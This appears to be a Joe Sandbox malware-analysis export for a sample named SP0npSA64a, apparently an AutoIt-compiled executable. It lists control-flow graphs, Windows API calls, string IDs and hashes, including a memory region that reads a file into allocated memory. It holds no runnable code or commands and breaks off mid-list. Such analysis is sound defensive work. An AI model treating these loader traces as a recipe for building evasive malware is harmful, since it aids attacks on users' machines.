                                                                                  control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2055 40f679-40f67c 2051->2055 2054 40f640 2052->2054 2056 40f642-40f650 2054->2056 2055->2045 2057 40f652-40f655 2056->2057 2058 40f67e-40f68c 2056->2058 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2051 2059->2054 2072 425d43-425d5f call 414d30 2060->2072 2061->2057 2064 40f6b4-40f6c2 2062->2064 2065 40f6af-40f6b2 2062->2065 2067 425d16 2064->2067 2068 40f6c8-40f6d6 2064->2068 2065->2057 2067->2060 2070 425d05-425d0b 2068->2070 2071 40f6dc-40f6df 2068->2071 2070->2056 2073 425d11 2070->2073 2071->2057 2072->2050 2073->2067
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                  • String ID: AU3!$EA06
                                                                                  • API String ID: 1268643489-2658333250
                                                                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2082 40112c-401141 DefWindowProcW 2079->2082 2084 401184-40118e call 401250 2080->2084 2085 40114c-40114f 2080->2085 2081->2080 2083 401120-401126 2081->2083 2083->2082 2089 42b038-42b03f 2083->2089 2093 401193-40119a 2084->2093 2086 401151-401157 2085->2086 2087 40119d 2085->2087 2090 401219-40121f 2086->2090 2091 40115d 2086->2091 2094 4011a3-4011a9 2087->2094 2095 42afb4-42afc5 call 40f190 2087->2095 2089->2082 2092 42b045-42b059 call 401000 call 40e0c0 2089->2092 2090->2083 2098 401225-42b06d call 468b0e 2090->2098 2096 401163-401166 2091->2096 2097 42b01d-42b024 2091->2097 2092->2082 2094->2083 2101 4011af 2094->2101 2095->2093 2103 42afe9-42b018 call 40f190 call 401a50 2096->2103 2104 40116c-401172 2096->2104 2097->2082 2102 42b02a-42b033 call 4370f4 2097->2102 2098->2093 2101->2083 2108 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2101->2108 2109 4011db-401202 SetTimer RegisterWindowMessageW 2101->2109 2102->2082 2103->2082 2104->2083 2112 401174-42afde call 45fd57 2104->2112 2109->2093 2110 401204-401216 CreatePopupMenu 2109->2110 2112->2082 2127 42afe4 2112->2127 2127->2093
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                  • CreatePopupMenu.USER32 ref: 00401204
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                  • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 004115F1
                                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                  • std::exception::exception.LIBCMT ref: 00411626
                                                                                  • std::exception::exception.LIBCMT ref: 00411640
                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                  • String ID: ,*H$4*H$@fI
                                                                                  • API String ID: 615853336-1459471987
                                                                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2147 3faae58-3faaf06 call 3fa88a8 2150 3faaf0d-3faaf33 call 3fabd68 CreateFileW 2147->2150 2153 3faaf3a-3faaf4a 2150->2153 2154 3faaf35 2150->2154 2159 3faaf4c 2153->2159 2160 3faaf51-3faaf6b VirtualAlloc 2153->2160 2155 3fab085-3fab089 2154->2155 2157 3fab0cb-3fab0ce 2155->2157 2158 3fab08b-3fab08f 2155->2158 2161 3fab0d1-3fab0d8 2157->2161 2162 3fab09b-3fab09f 2158->2162 2163 3fab091-3fab094 2158->2163 2159->2155 2166 3faaf6d 2160->2166 2167 3faaf72-3faaf89 ReadFile 2160->2167 2168 3fab0da-3fab0e5 2161->2168 2169 3fab12d-3fab142 2161->2169 2164 3fab0af-3fab0b3 2162->2164 2165 3fab0a1-3fab0ab 2162->2165 2163->2162 2172 3fab0c3 2164->2172 2173 3fab0b5-3fab0bf 2164->2173 2165->2164 2166->2155 2174 3faaf8b 2167->2174 2175 3faaf90-3faafd0 VirtualAlloc 2167->2175 2176 3fab0e9-3fab0f5 2168->2176 2177 3fab0e7 2168->2177 2170 3fab152-3fab15a 2169->2170 2171 3fab144-3fab14f VirtualFree 2169->2171 2171->2170 2172->2157 2173->2172 2174->2155 2178 3faafd2 2175->2178 2179 3faafd7-3faaff2 call 3fabfb8 2175->2179 2180 3fab109-3fab115 2176->2180 2181 3fab0f7-3fab107 2176->2181 2177->2169 2178->2155 2187 3faaffd-3fab007 2179->2187 2182 3fab122-3fab128 2180->2182 2183 3fab117-3fab120 2180->2183 2185 3fab12b 2181->2185 2182->2185 2183->2185 2185->2161 2188 3fab03a-3fab04e call 3fabdc8 2187->2188 2189 3fab009-3fab038 call 3fabfb8 2187->2189 2195 3fab052-3fab056 2188->2195 2196 3fab050 2188->2196 2189->2187 2197 3fab058-3fab05c CloseHandle 2195->2197 2198 3fab062-3fab066 2195->2198 2196->2155 2197->2198 2199 3fab068-3fab073 VirtualFree 2198->2199 2200 3fab076-3fab07f 2198->2200 2199->2200 2200->2150 2200->2155
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FAAF29
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FAB14F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2227636278.0000000003FA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_3fa8000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileFreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 204039940-0
                                                                                  • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                  • Instruction ID: 90a1262df428777be71a16c94104a876b05fa8992ca1ca02cf12cecccc521f13
                                                                                  • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                  • Instruction Fuzzy Hash: BCA118B5E04609EBDF14CFA8C898BEEBBB5BF48304F248159E111BB290D7759E44DB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2201 401250-40125c 2202 401262-401293 call 412f40 call 401b80 2201->2202 2203 4012e8-4012ed 2201->2203 2208 4012d1-4012e2 KillTimer SetTimer 2202->2208 2209 401295-4012b5 2202->2209 2208->2203 2210 4012bb-4012bf 2209->2210 2211 4272ec-4272f2 2209->2211 2212 4012c5-4012cb 2210->2212 2213 42733f-427346 2210->2213 2214 4272f4-427315 Shell_NotifyIconW 2211->2214 2215 42731a-42733a Shell_NotifyIconW 2211->2215 2212->2208 2216 427393-4273b4 Shell_NotifyIconW 2212->2216 2217 427348-427369 Shell_NotifyIconW 2213->2217 2218 42736e-42738e Shell_NotifyIconW 2213->2218 2214->2208 2215->2208 2216->2208 2217->2208 2218->2208
                                                                                  APIs
                                                                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3300667738-0
                                                                                  • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                  • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2222 427190-4271ae RegQueryValueExW 2219->2222 2223 40e4eb-40e4f0 2219->2223 2224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2222->2224 2225 42721a-42722a RegCloseKey 2222->2225 2230 427210-427219 call 436508 2224->2230 2231 4271f7-42720e call 402160 2224->2231 2230->2225 2231->2230
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue$CloseOpen
                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                  • API String ID: 1586453840-614718249
                                                                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateShow
                                                                                  • String ID: AutoIt v3$edit
                                                                                  • API String ID: 1584632944-3779509399
                                                                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Copy$ClearErrorLast
                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                  • API String ID: 2487901850-572801152
                                                                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                  APIs
                                                                                    • Part of subcall function 03FAAB48: Sleep.KERNELBASE(000001F4), ref: 03FAAB59
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FAAD4F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2227636278.0000000003FA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_3fa8000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileSleep
                                                                                  • String ID: 3KFIH4RQJ1
                                                                                  • API String ID: 2694422964-3799024907
                                                                                  • Opcode ID: 08e4b15dad0e13848f6ac2aa8bc3ed37bbad4d39d681b7760cc91ae9c1012293
                                                                                  • Instruction ID: 165ef207203484a4c5ee7a9cdee7a346c3371d8be8250a01fd4056c03fa66632
                                                                                  • Opcode Fuzzy Hash: 08e4b15dad0e13848f6ac2aa8bc3ed37bbad4d39d681b7760cc91ae9c1012293
                                                                                  • Instruction Fuzzy Hash: 50519171D50309DBDF11DBE8C844BEEBB79AF19300F0045A8E609BB2C0D6795B49CBA5
                                                                                  APIs
                                                                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  • _wcsncpy.LIBCMT ref: 00401C41
                                                                                  • _wcscpy.LIBCMT ref: 00401C5D
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                  • String ID: Line:
                                                                                  • API String ID: 1874344091-1585850449
                                                                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$OpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  • API String ID: 1607946009-824357125
                                                                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                  APIs
                                                                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                  • _wcsncpy.LIBCMT ref: 004102ED
                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                  • _wcsncpy.LIBCMT ref: 00410340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
